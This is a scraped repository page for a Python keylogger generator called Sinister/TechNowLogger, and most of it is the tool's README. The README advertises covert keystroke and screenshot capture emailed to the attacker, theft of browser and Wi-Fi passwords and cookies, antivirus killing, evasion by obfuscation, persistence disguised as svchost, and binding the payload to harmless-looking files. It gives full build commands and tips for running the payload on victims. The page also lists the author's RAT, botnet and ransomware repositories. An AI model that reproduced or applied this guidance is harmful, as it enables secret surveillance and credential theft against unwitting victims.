PushpenderIndia/Sinister PushpenderIndia/Sinister

  • Stars
    star
    418
  • Rank 100,378 (Top 3 %)
  • Language
    Python
  • License
    BSD 3-Clause "New...
  • Created over 4 years ago
  • Updated 6 months ago
Twitter logo Share LinkedIn logo Share Facebook logo Share
PushpenderIndia/Sinister
github

PushpenderIndia

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

Sinister is Windows/Linux Keylogger Generator which sends key-logs via email with other juicy target info

TechNowLogger Logo

TechNowLogger

Hacker GIF 

                    This small python script can do really awesome work.

TechNowLogger is Keylogger Generator for Windows/Linux, which sends key-logs & screenshot via email with other juicy target info written in Python 3.

Disclaimer

๐Ÿ’ป This project was created only for good purposes and personal use.

THIS SOFTWARE IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND. YOU MAY USE THIS SOFTWARE AT YOUR OWN RISK. THE USE IS COMPLETE RESPONSIBILITY OF THE END-USER. THE DEVELOPERS ASSUME NO LIABILITY AND ARE NOT RESPONSIBLE FOR ANY MISUSE OR DAMAGE CAUSED BY THIS PROGRAM.

Features

  • Works on Windows/Linux
  • Notify New Victim Via Email
  • Undetectable
  • Persistence
  • Email Credentials Validation before Payload Generation.
  • Can receive Keylogs in any email provider such as GMAIL, YAHOO, OUTLOOK, Custom SMTP.
  • SMTP Server/ Port
Server Name SMTP Server SMTP Port
GMAIL smtp.gmail.com 587
OUTLOOK smtp-mail.outlook.com 587
YAHOO smtp.mail.yahoo.com 587
  • Sends Screenshot of Victim PC's Screen via email
  • Creates Executable Binary With Zero Dependencies
  • Create less size ~ 5mb payload with advance functionality
  • Obfusticate the Payload before Generating it, hence Bypassing few more antivirus
  • Generated Payload is Encoded with base64, hence makes extremely difficult to reverse engineer the payload
  • Function to Kill Antivirus on Victim PC and tries to disable the security
  • Awesome Colourful Interface to generate payload
  • On Attacker Side: While Creating Payload, Script Automatically Detects Missing Dependencies & Installs Them
  • Distinguish Log Data on the Basics of Active Window Name (Check Image for Better Understanding)
  • Able to add custom Icon to evil file
  • Built-in Binder which can bind Keylogger to Any File [.pdf, .txt, .exe etc], Running legitimate file on front end & evil codes in back-end as a service.
  • Checks for Already Running Instance on System, If running instance found, then only legitimate file is executed [Multiple Instance Prohibiter to avoid Receiving Duplicate Email Logs].
  • Attacker can Create/Compile for Both Windows/Linux OS Using Linux System, But Can only Create/Compile Windows Executable using Windows Machine
  • Retrieves Saved Passwords from victim System and sends it to Attacker.
Built-in Stealer Can Steal These Things :
Chrome Browser (Saved Password)
WiFi (Saved Password)
Chrome Cookies (Login Data, Cookies, History)
Firefox Cookies (cookies.sqlite)

Note: Custom Stealer is Coded, does not relies on LaZagne

  • Grabs & Send Useful Information of Victim's Device
These Things are Grabbed & Sended:
Operating System
Computer Name
User Name
Public IPv4
  • If your payload is unable to execute, then specify --debug to run exe on foreground with CMD

Important

On 30 May 2022, Google has removed less secure apps feature, so instead of Gmail Password:

  • Enable 2FA on your attacker gmail
  • Create App Specific Password
  • Use that app specific password, while creating payload.
  • How to Create App Specific Password: Click Here

Tested On

Kali) Kali Linux - ROLLING EDITION

Windows) Windows 10

Windows) Windows 8.1 - Pro

Windows) Windows 7 - Ultimate

Prerequisite

  • Python 3.X
  • Few External Modules

How To Use in Linux

# Navigate to the /opt directory (optional)
$ cd /opt/

# Clone this repository
$ git clone https://github.com/PushpenderIndia/technowlogger.git

# Navigate to technowlogger folder
$ cd technowlogger

# Installing dependencies
$ bash installer_linux.sh

*** Note When The Python Installer DialogBox Appear while executing installer_linux.sh ***
    * Click on custom install 
    * Select Path to : C:/Python37-32
    ### So that the python is installed in this path (Inside Wine) : ~/.wine/drive_c/Python37-32

# If you are getting any errors while executing installer_linux.sh, try to install using installer_linux.py
$ python3 installer_linux.py

$ chmod +x technowgen.py
$ python3 technowgen.py --help

# Making Payload/RAT
$ python3 technowgen.py -e [email protected] -p YourEmailPass -l -o output_file_name --icon icon_path

# Making Payload using GMAIL SMTP Server, Port Configuration (Default SMTP Server = smtp.gmail.com, Default SMTP Port = 587)
$ python3 technowgen.py -e [email protected] -p YourEmailPass -l -o output_file_name --icon icon_path

# Making Payload using OUTLOOK SMTP Server, Port Configuration
$ python3 technowgen.py -e [email protected] -p YourEmailPass -x smtp-mail.outlook.com -y 587 -l -o output_file_name --icon icon_path

# Making Payload using YAHOO SMTP Server, Port Configuration
$ python3 technowgen.py -e [email protected] -p YourEmailPass -x smtp.mail.yahoo.com -y 587 -l -o output_file_name --icon icon_path

Note: You can also use our custom icons from the icon folder, just use them like this  --icon icon/pdf.ico

How To Use in Windows

# Install dependencies 
$ Install latest python 3.x

# Clone this repository
$ git clone https://github.com/PushpenderIndia/technowlogger.git

# Go into the repository
$ cd technowlogger

# Installing dependencies
$ python -m pip install -r requirements.txt

# Open technowgen.py in Text editor and Configure Line 16 WINDOWS_PYTHON_PYINSTALLER_PATH = "C:/Python37-32/Scripts/pyinstaller.exe" 

# Getting Help Menu
$ python technowgen.py --help

# Making Payload/RAT
$ python technowgen.py -e [email protected] -p YourEmailPass -w -o output_file_name --icon icon_path

# Making Payload using GMAIL SMTP Server, Port Configuration (Default SMTP Server = smtp.gmail.com, Default SMTP Port = 587)
$ python technowgen.py -e [email protected] -p YourEmailPass-w -o output_file_name --icon icon_path

# Making Payload using OUTLOOK SMTP Server, Port Configuration
$ python technowgen.py -e [email protected] -p YourEmailPass -x smtp-mail.outlook.com -y 587 -w -o output_file_name --icon icon_path

# Making Payload using YAHOO SMTP Server, Port Configuration
$ python technowgen.py -e [email protected] -p YourEmailPass -x smtp.mail.yahoo.com -y 587 -w -o output_file_name --icon icon_path

Note: You can also use our custom icons from the icon folder, just use them like this  --icon icon/pdf.ico

commands for windows

How to Update

  • Run updater.py to Update Autmatically or Download the latest Zip from this GitHub repo
  • Note: Git Must be Installed in order to use updater.py

Note:- Evil File will be saved inside dist/ folder, inside technowlogger/ folder

Available Arguments

  • Optional Arguments
Short Hand Full Hand Description
-h --help show this help message and exit
-i INTERVAL --interval INTERVAL Time between reports in seconds. default=120
-t TIME_PERSISTENT --persistence TIME_PERSISTENT Becoming Persistence After __ seconds. default=10
-x SMTP_Server --smtp Custom SMTP Server . default="smtp.gmail.com"
-y SMTP_Port --port Custom SMTP Port . default=587
-w --windows Generate a Windows executable.
-l --linux Generate a Linux executable.
-s --steal-password Steal Saved Password from Victim Machine [Supported OS : Windows]
-b file.txt --bind LEGITIMATE_FILE_PATH.pdf AutoBinder : Specify Path of Legitimate file. [Supported OS : Windows]
-d --debug Payload Will Run In Foreground with CMD Window, To get Appropriate Execution Error

Note : Either -w/--windows or -l/--linux must be specified

  • Required Arguments
Short Hand Full Hand Description
--icon ICON Specify Icon Path, Icon of Evil File [Note : Must Be .ico]
-e EMAIL --email EMAIL Email address to send reports to.
-p PASSWORD --password PASSWORD Password for the email address given in the -e argument.
-o OUT --out OUT Output file name.

New Screenshots:

Getting Help

Generating payload

Getting report

Log Data is Distinguished on The Basics of Active Window Name ~ Feature Added to v1.3 & Onward

Retrives & Sends Saved Chrome Browser's Password

  • Note: In order to use this feature, specify -s or --steal-password while creating keylogger

Retrives & Sends Saved WIFI Password

  • Note: In order to use this feature, specify -s or --steal-password while creating keylogger

Also Refer These Old Images

~Old Screenshots:

Getting Help

Running technowgen.py Script

Building Finished

When Keylogger runs, it adds Registry to become persistence

Makes copy of itself and saved it inside Roaming

Typing Random text to test Keylogger

Report 1 sended by TechNowLogger

Login facebook ~ Victim

Report 2 - Keylogs of facebook Credentials

Report 3 - With Screenshots

Debug Issues

Try to Run Offline Keylogger in order to test Offline Key logs capturing & Debug keylogger issues by running these commands:

Run test_key.py In both the modes [Compiled & Raw] and figure out whats the error

Run it like this : python test_key.py

Also Compile it like this: pyinstaller --onefile test_key.py --hidden-import=win32event --hidden-import=winerror --hidden-import=win32api --hidden-import=pynput.keyboard

After running it, Start typing something, Result will be displayed on the Command prompt after every 10 seconds

Offline keylogger's files are present in TestKeylogger Folder

  • If payload is unable to execute on victim's system
1. Create a new payload with --debug flag
2. Run payload exe throught cmd [Don't Execute Payload By Double Clicking It]
3. It will now give more appropriate error in CMD, just put that issue in Issue Section

Removing TechNowLogger in Windows:

Method 1:

  • Go to start, type regedit and run the first program, this will open the registry editor.
  • Navigate to the following path Computer\HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run There should be an entry called svchost, right click this entry and select Delete.
  • Go to your user path > AppData > Roaming, youโ€™ll see a file named โ€œsvchost.exeโ€, this is the RAT, right click > Delete.
  • Restart the System.

Method 2:

  • Run "RemoveTechnowLogger.bat" in Infected System and then restart the PC to stop the current Running Evil File.

Removing TechNowLogger in Linux:

  • Open Autostart file with any text editor, Autostart File Path: ~/.config/autostart/xinput.desktop

  • Remove these 5 lines:

       [Desktop Entry]
   Type=Application
   X-GNOME-Autostart-enabled=true
   Name=Xinput
   Exec="destination_file_name"

  • Note: destination_file_name is that name of evil_file which you gave to your Keylogger using -o parameter

  • Reboot your system and then delete the evil file stored this this below path

  • Destination Path, where Keylogger is stored : ~/.config/xnput

Contributors


Pushpender Singh
๐Ÿ’ป
Thomas Kunwar
๐Ÿ’ป
krasnova19
๐Ÿ’ป
sarchish5
๐Ÿ’ป
chiragcode11
๐Ÿ’ป

Contributions of any kind welcome!

NOTE: If you should be on the list of contributors but we forgot you, then do let us know!

TODO

  • Suggest your own feature
  • Add New features
  • Contribute GUI Version

More Repositories

1

thorse

THorse is a RAT (Remote Administrator Trojan) Generator for Windows/Linux systems written in Python 3.
Python
547
star
2

KratosKnife

KratosKnife is a Advanced BOTNET Written in python 3 for Windows OS. Comes With Lot of Advanced Features such as Persistence & VM Detection Methods, Built-in Binder, etc
Python
335
star
3

crypter

Crypter in Python 3 with advanced functionality, Bypass VM, Encrypt Source with AES & Base64 Encoding | Evil Code is executed by bruteforcing the decryption key, and then executing the decrypted evil code
Python
315
star
4

apkinfector

Advanced Android AV Evasion Tool Written In Python 3 that can Embed/Bind meterpreter APK to any Legitimate APK
Python
265
star
5

nekros

NekRos is an Open-Source Ransomeware, with advanced Features, Which Looks Like Wannacry and Has C&C Server which can be Used to Retrive KEY
Python
115
star
6

subdover

Subdover is a MultiThreaded Subdomain Takeover Vulnerability Scanner Written In Python3
Python
97
star
7

fakemailer

Fake Mailer is a PHP Email Spoofer which is capable of sending spoofed or tampered emails to the target. No Need to Sign up, Send Email Anonymously, Demo Site is available for test!
HTML
69
star
8

oscp-notes

OSCP Notes written from PWK Course
44
star
9

aapfinder

AAP Finder (Advanced Admin Page Finder) is a tool written in Python3 with advanced functionalities
Python
44
star
10

Log4jScanner

Log4jScanner is a Log4j Related CVEs Scanner, Designed to Help Penetration Testers to Perform Black Box Testing on given subdomains.
Python
41
star
11

ORhunter

ORhunter is an Open Redirect Vulnerability Scanner which Passively Crawls URLs from 3 Sources & Then Filter Potential URLs based on Parameter Values, then finally hunt them for Unvalidated Open Redirect
Python
40
star
12

brute-md5

Advanced, Light Weight & Extremely Fast MD5 Cracker/Decoder/Decryptor written in Python 3
Python
26
star
13

creds_harvester

Password Recovery Toolkit For Windows Written in Python 3
Python
25
star
14

ragno

Ragno is a Passive URL Crawler | Written in Python3 | Fetches URLs from the Wayback Machine, AlienVault's Open Threat Exchange & Common Crawl
Python
24
star
15

Java-Cheat-Sheet

Java Cheat Sheet : Comprehensive Java Programming Guide With Mini Projects | Best for people, who are coming from other programming language or Just want a quick Refresh
21
star
16

netscan

NetScan is a Network Reconnaissance Tool for Windows/Linux/OSx etc Written in Python 3.
Python
21
star
17

SQLiWeb

Lab Website For Practicing Different Types of SQL Injection Vulnerabilities
PHP
19
star
18

CVE-2020-5902-Scanner

Automated F5 Big IP Remote Code Execution (CVE-2020-5902) Scanner Written In Python 3
Python
15
star
19

TerminalChat

TerminalChat is a console based instant messaging application made for hackers written in python3 & php. Gives all Basic Messaging Functionality
PHP
15
star
20

FileUploadWeb

Collection of Vulnerable Websites containing File Upload Vulnerability for practicing skill
HTML
13
star
21

PythonWindowsService

Basic Script which you can use to create a Windows service In Python
12
star
22

EARScanner

Execution After Redirect (EAR) / Long Response Redirection Vulnerability Scanner written in python3, It Fuzzes All URLs of target website & then scan them for EAR
Python
11
star
23

PushpenderIndia

My GitHub Profile-README
6
star
24

Free_YouTube_Stats_Badge

This project will help you to create Live img.shields.io Badges which will Count YouTube Stats (Subscriber, Views, Videos) without YouTube API
Go
5
star
25

intelliHire

WarSpeed Hackathon By Lightspeed organised at 13 May 2023
HTML
3
star
26

Crunchy

Script to Generate Custom WiFi Passwords as per Target for Highest Cracking Possiblity
Shell
2
star
27

StoryScape

StoryScape is a GenAI Interactive Story teller made for Intel GenAI hackathon IIT Delhi
Jupyter Notebook
1
star
28

EasyFlaskRecaptcha

FlaskRecaptcha is a python Module which makes Google Recaptcha Integration in flask application easy
Python
1
star